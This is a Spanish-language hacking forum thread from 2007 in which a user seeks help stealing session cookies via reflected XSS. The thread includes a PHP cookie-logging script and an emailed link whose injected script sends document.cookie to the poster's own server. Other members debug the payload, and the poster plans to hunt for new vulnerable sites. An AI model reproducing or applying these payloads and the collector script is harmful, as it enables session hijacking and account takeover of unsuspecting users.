Ayuda con XSS

Iniciado por magarcan, 28 Noviembre 2007, 12:56 PM

0 Miembros y 2 Visitantes están viendo este tema.

magarcan

He estado leyendo en el foro sobre XSS (indirecta) y me he puesto a hacer mis pruebas. Durante éstas estoy intentando capturar cookies.
Para ello:
-He creado un script en php y lo he colocado en mi server que crea un TXT y guarda la información de la cookie.
-Mando un email con un hipervínculo a la url vulnerable+script.
El problema es que no recibo nada no sé si falla el código del script de mi server, el que coloco en el hipervínculo o que la url ha dejado de ser vulnerable. ¿Mepodéis echar una mano? GRACIAS

Adjuntos:
Mi script PHP
<?
$fp = fopen("captura.txt","a");
fputs($fp, $cookie);
fclose($fp);
echo "<script>window.location=http://www.google.com</script>";
?>


Lo que pongo en el hipervínculo:
http://www.servidorvulnerable.../.../...=<script>window.location='http://miserver.com/script.php?cookie='+document.cookie</script>

EvilGoblin

y estas seguro que esa persona esta logueada?

pork de no ser asi recibiras el archivo en blanco..


y creo que en el txt te falta el $_GET para capturar la Cookie desde el link

con el metodo get

=D

Suerte ;D
Experimental Serial Lain [Linux User]

дٳŦ٭

Cita de: magarcan en 28 Noviembre 2007, 12:56 PM
He estado leyendo en el foro sobre XSS (indirecta) y me he puesto a hacer mis pruebas. Durante éstas estoy intentando capturar cookies.
Para ello:
-He creado un script en php y lo he colocado en mi server que crea un TXT y guarda la información de la cookie.
-Mando un email con un hipervínculo a la url vulnerable+script.
El problema es que no recibo nada no sé si falla el código del script de mi server, el que coloco en el hipervínculo o que la url ha dejado de ser vulnerable. ¿Mepodéis echar una mano? GRACIAS

Adjuntos:
Mi script PHP
<?
$fp = fopen("captura.txt","a");
fputs($fp, $cookie);
fclose($fp);
echo "<script>window.location=http://www.google.com</script>";
?>


Lo que pongo en el hipervínculo:
http://www.servidorvulnerable.../.../...=<script>window.location='http://miserver.com/script.php?cookie='+document.cookie</script>

Dale

http://www.servidorvulnerable.../.../...=<script>window.location='http://miserver.com/script.php?cookie='+document.cookie+'blabla'</script>


Con sangre andaluza :)


magarcan

Gracias por las respuestas.
Cita de: EvilGobliny estas seguro que esa persona esta logueada?
Sí, porque estoy haciendo las pruebas con una cuenta de mail que me he creado para hacer las pruebas.

Cita de: EvilGobliny creo que en el txt te falta el $_GET para capturar la Cookie desde el link
¿En que parte del código?

Cita de: Ing_AmcDale
http://www.servidorvulnerable.../.../...=<script>window.location='http://miserver.com/script.php?cookie='+document.cookie+'blabla'</script>
Ahora mismo lo pruebo. Por cierto, ¿qué hace eso que has añadido?

EvilGoblin

te dice que le agreges una cadena, para comprobar verdaderamente si guarda el texto ;P

si te guarda solo "blablabla"

es que no habia cookie para guardar ^^
Experimental Serial Lain [Linux User]

magarcan

Ok, el caso es que no me crea el archivo, por lo que pienso que la url vulnerable que utilizo ha sido arreglada. Ahora me toca buscar nuevas.  :-\
A ver si tengo suerte.

EvilGoblin

Creo que no es nada dificil comprobar si el error de XSS sigue funcionado :P

se supone q vos lo encontraste.....

y no sabes como capturar la cookie?

xDD no entiendo aun como pudiste encontrarlo.. y menos aun como no sabes comprobar si funciona o no... y capturar la cookie -.-

aniway! ^^=D

MUCHA SUERTE (Y)
Experimental Serial Lain [Linux User]

magarcan

Definitivamente la vulnerabilidad ha sido corregida (es que la descubrí hace tiempo cuando empecé a estudiar los XSS).
Me toca descubrir otra vulnerabilidad para hacer pruebas y ver si con mi código me guarda las cookies.

PD: en la entrada XSS de la wikipedia hay otro código para guardar las cookies más currado que el mío, a lo mejor lo adopto.
PD2: si me recomendáis algún link sobre XSS nunca está de más.

---GRACIAS---

zhynar_X

Seguro que tardas bien poco en encontrar otro bug... internet esta plagado de XSS...


Mira este link sobre los XSS (esta muy currado  ;)):
http://icenetx.net/sesiones/tutos/XSS-a-fondo-por-trew.pdf


Saludos
Me he creado un blog:
http://zhynar.blogspot.com  Aver si os gusta! ;)


Optimista es aquel que cree poder resolver un atasco de trafico tocando el claxon (Anonimo)

hackpsycho

Cita de: zhynar_X en 28 Noviembre 2007, 21:57 PM
Seguro que tardas bien poco en encontrar otro bug... internet esta plagado de XSS...


Mira este link sobre los XSS (esta muy currado  ;)):
http://icenetx.net/sesiones/tutos/XSS-a-fondo-por-trew.pdf


Saludos

Muy buen documento me lo lei completito  ;D